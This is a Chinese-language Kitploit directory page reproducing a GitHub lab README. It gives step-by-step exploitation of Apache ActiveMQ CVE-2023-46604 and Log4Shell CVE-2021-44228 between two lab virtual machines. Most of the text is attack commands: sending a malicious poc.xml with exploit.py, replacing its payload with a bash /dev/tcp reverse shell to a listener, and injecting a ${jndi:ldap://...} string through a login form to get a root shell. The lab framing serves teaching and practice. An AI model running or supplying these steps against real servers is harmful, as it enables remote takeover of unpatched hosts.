Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/dcm2406/cve-lab
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育实验室与实践
GitHubdcm2406/cve-lab

CVE-Lab

利用CVE-2021-44228和CVE-2023-46604漏洞的说明

查看仓库
242年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-46604 实验

本实验指导如何利用 CVE-2023-46604 漏洞。

致谢

  • Apache ActiveMQ
  • CVE-2023-46604

环境

本实验需要安装两台虚拟机:一台 Kali Linux 2023.4 版,一台 Ubuntu 22.04.3 LTS 版。您可以通过以下链接下载:

  • Kali Linux 2023.4
  • Ubuntu 22.04.3 LTS
  • VMware-workstation-17.5.0 for windows
  • VMware-workstation-17.5.0 for linux

模型与系统要求

在 Kali Linux 虚拟机上:

安装 git

root@kitploit:~
$sudo apt install git

安装 gedit

root@kitploit:~
$sudo apt install gedit

在 Ubuntu 虚拟机上:

安装 git

root@kitploit:~
$sudo apt install git

安装 openjdk 18

root@kitploit:~
$sudo apt install openjdk-18-jdk

安装 ActiveMQ 5.18.2 包

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/ApacheActiveMQ
$cd ApacheActiveMQ/
$tar -xf apache-activemq-5.18.2-bin.tar.gz

构建服务器(启动 activemq 服务)

在 Ubuntu 虚拟机上 打开终端窗口,按如下命令运行:

root@kitploit:~
$sudo su
$cd ApacheActiveMQ/apache-activemq-5.18.2/bin/linux-x86-64
$./activemq start

检查服务状态:

root@kitploit:~
$./activemq status

如果服务成功启动,终端屏幕将显示 "ActiveMQ Brocker is running"。

您还可以访问 http://127.0.0.1:8161 打开 ActiveMQ 代理管理器。其中包含主机名、版本、ID、运行时间及其他信息。

利用

在 Kali Linux 虚拟机上

下载利用过程所需的资源:

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/CVE-2023-46604
$cd CVE-2023-46604
$ls

如您所见,我们有两个文件:exploit.py 和 poc.xml:

  • poc.xml 文件包含一段恶意代码,用于利用 OpenWire 协议中的漏洞。
  • exploit.py 文件负责进行 HTTP 加密并将 poc.xml 文件发送到目标机器上的代理。 在资源路径下打开一个 Web 服务器:
root@kitploit:~
$cd CVE-2023-46604
$python3 -m http.server

打开一个新终端窗口,通过 exploit.py 文件将 poc.xml 发送到目标服务器:

root@kitploit:~
$sudo su
$cd CVE-2023-46604
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

命令执行后,目标机器上会启动计算器应用程序。这证明漏洞已被成功利用。接下来我们创建反弹 shell 来控制目标机器。

打开一个新终端窗口,监听反弹 shell 连接:

root@kitploit:~
$sudo su
$nc -nlvp 4444

返回上一个终端,编辑 poc.xml 文件:

root@kitploit:~
$gedit poc.xml

将 gnome-calculator 值替换为 bash -i >& /dev/tcp/192.168.132.130/4444 0>&1 并保存文件。

再次发送恶意代码:

root@kitploit:~
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

该命令的结果是我们获得了目标机器的 root shell。已 ROOTED!!!

CVE-2021-44228 实验

致谢

  • Apache log4j
  • CVE-2023-44228 - log4shell

环境

本实验需要安装两台虚拟机:一台 Kali Linux 2023.4 版,一台 Ubuntu 22.04.3 LTS 版。您可以通过以下链接下载:

  • Kali Linux 2023.4
  • Ubuntu 22.04.3 LTS
  • VMware-workstation-17.5.0 for windows
  • VMware-workstation-17.5.0 for linux

模型与系统要求

在 Kali Linux 虚拟机上:

安装 git

root@kitploit:~
$sudo apt install git

安装 gedit

root@kitploit:~
$sudo apt install gedit

在 Ubuntu 虚拟机上:

安装 git

root@kitploit:~
$sudo apt install git

安装 docker

root@kitploit:~
$sudo apt install docker.io 

构建 Web 服务器

在 Ubuntu 虚拟机上

步骤 1:下载 openjdk

root@kitploit:~
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz
$tar -xf jdk-8u20-linux-x64.tar.gz

步骤 2:下载并构建 docker 文件

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/web-server-cve44228
root@kitploit:~
$docker build -t cve44228
$docker run --network host cve44228

完成以上命令后,我们就有了一个网站。要浏览该网站,您可以使用 URL:http://<ubuntu_ip>:8080。在本教程中,地址形式为:http://192.168.132.135:8080

利用

在 Kali Linux 虚拟机上,下载利用漏洞所需的资源

下载 poc

root@kitploit:~
$sudo su
$git clone https://github.com/kozmer/log4j-shell-poc
$pip install -r requirement.txt

下载 openjdk

root@kitploit:~
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz

//将 openjdk 文件移动到包含 poc 文件的目录
$mv jdk-8u20-linux-x64.tar.gz <包含 poc 文件的目录路径>

$tar -xf jdk-8u20-linux-x64.tar.gz   //解压文件

打开一个新终端,监听反弹 shell 连接:

root@kitploit:~
$sudo su
$nc -nlvp 9001

启动 LDAP 和 HTTP 服务(使用 poc 文件)

root@kitploit:~
$sudo su
$cd log4j-shell-poc
$python3 poc.py --userip 192.168.132.130 --lport 9001 --webport 8080

该命令将返回类似以下的结果

root@kitploit:~
[!] CVE: CVE-2021-44228
Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://192.168.132.130:1389/a}

[+] Starting Webserver on port 8080 http://0.0.0.0:8080
Listening on 0.0.0.0:1389

这里,我们只对生成的 jndi 值感兴趣。 打开 Web 浏览器,输入您之前创建的网站地址。 使用 jndi 值登录。此时,netcat 终端将收到连接。 ROOTED!!!

文档

CVE 研究报告

支持

如有问题,请发送邮件至 [email protected]

作者

  • @dcm2406
  • @tCu0n9
下载工具